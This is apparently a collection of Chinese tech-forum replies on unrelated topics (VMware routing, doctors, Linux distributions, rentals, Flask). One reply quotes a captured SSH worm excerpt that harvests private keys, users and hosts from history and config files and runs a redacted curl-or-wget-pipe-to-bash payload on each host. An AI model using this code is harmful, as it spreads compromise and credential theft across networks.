装了一个 cockpit，在控制台点一下就能切换到其他服务器

@lry 看看客户机的路由表，和对应的虚拟的网络接口。
你这个不应该是这样加的，可能要指定一下接口

现在就是不确定的是，vmware 能不能把包正常转发给内部的虚拟机，这个没验证过。

我自己测试过 kvm 的 router 网络，是可以访问的虚拟机的。kvm 的 router 网络和 nat 应该差不太多。

如果跨 IP 网段，数据包就需要先把数据包转发给网关(路由器)，然后由路由器判断下一跳去哪。所以你要在路由器上检查一下发往虚拟机的包发去哪里了，(一般路由器默认只有一个指向 wan 口的默认路由，不会有 vmware 定义的路由，所以数据包就直接从默认的 wan 口发走了)

你可以在路由器再加一个路由指向 vmware 的虚拟机，将发往虚拟机网段的数据包先转发给 vmware 。

最后在 vmware 上再转发给虚拟机。

说实话我觉得没有任何意义

这就好比老板根据你写代码时的坐姿来判断程序写不写的好

医生是否好坏，评价的角度可以是多种多样的。医生的医术是否高明和医生的态度也没有多大关系。真大大多数情况下，去医院我觉都应该是为了治病吧？而不是为了体验好。我并不是说不需要体验，只是觉得优先级不应该比“医术”高。

你有没有想过，如果病人隐瞒过往病史、谎报病情。会导致了误诊，有的时候甚至上了手术台才发现，严重的也可能会直接传染给医生。你是医生的话你该怎么办？还不是得首先要保护自己，去了医院得做一些检查、排除和确定一些问题，这有什么问题？

站在病人的立场上看这些可能是在走弯路和浪费金钱耽误治疗，但是对医生来说，某种意义上来说也是对自己的保护（和保护病人）

另外我基本上没见过坑的医生，相反见过很多矜矜业业的医生，可能是我运气比较好？

没错不就是拿来用的么，要是觉得卡，那就只能换机器了。

我只截取了脚本里面关于 ssh 扩散的这一部分，xxx 点 com 是一个下载脚本的 url，这里我给去掉了。

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://xxx.com)|bash >/dev/null 2>&1 &' & done
fi

for file in /home/*
do
if test -d $file; then
if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://xxx.com)|bash >/dev/null 2>&1 &' & done
fi
fi
done

localgo() {
myhostip=$(curl -sL icanhazip.com)
KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
USERZ=$(
echo "root"
find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq
)
USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
pl=$(
echo "22"
cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}'
)
sshports=$(echo "$pl" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
i=0
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
for sshp in $sshports; do
i=$((i+1))
if [ "${i}" -eq "20" ]; then
sleep 20
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
i=0
fi
#Wait 20 seconds after every 20 attempts and clean up hanging processes

chmod +r $key
chmod 400 $key
echo "$user@$host $key $sshp"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "export src=sshcopy;(curl -fsSL http://xxx.com||wget -q -O- http://xxx.com)|bash >/dev/null 2>&1 &"
done
done
done
done
}
localgo

@matrix67 我晚点整理一下发出来

缺点也是有的，它没有解析 known_hosts 文件里面的 base64，也算是留了改进的空间吧……

前段时间正好也遇到一个内网通过 ssh 扩散的脚本，可以说很是优秀的了。

用 find 去找私钥，从 hosts 文件里面找主机，从历史记录里面找 scp 和 ssh 的记录，从.ssh 目录里面找已经连接过的主机，从 config 文件里面拿私钥的路径，等等好几个来源。

最后最牛逼的是用这些从不同途径拿到的主机端口 key，又重新排列组合一遍，最后遍历这些组合。

无解，建议换个号重新开始。
之前用网易云的时候，fm 推荐也就刚刚注册账号后的一段时间正常一点，后面听的类型稍微杂一点，就开始瞎推荐了。

阿里云整一个最低配的 ecs 实例，然后宽带选按量付费，带宽拉满。5 年大概 600 块钱。

无法理解，说是让你自己存钱了，然后一段时间给他们看下，这是当家长的给小孩检查作业呢？

一直感觉 ubuntu 和 centos 或者 debian，其实对于大多数运维开发来说，都是稳定的。

很多时候即使服务器真的出现”不稳定“的情况，估计大多数人都是没办法察觉和去分辨出是不是服务器系统不稳定。（这里说的情况排除第三方软件包的问题，和排除非常专业的运维开发测试）

对于普通常规的项目，其实选什么都没差。无非就是包管理不太一样、软件仓库要新的还是旧的、图形界面选什么。如果乐意的话 windows 也是很好的选择。

这个产品经理厉害了

自如好像是有租金贷款的吧？
不过不管有没有租金贷，影响绝对是有的，不管自如后台硬不硬，要是几个月房子租不出去最后还是要倒。
中介租房这种业务风险还是挺高的，一间房要是一个月租不出去，可能就亏损千把块钱，租出去了才能赚几百块钱。

弄个 flask 当后台，然后写个 html 模板，模板上只要加一个输入框，一个提交按钮，不要求美观的话，最多 15 分钟就能做好。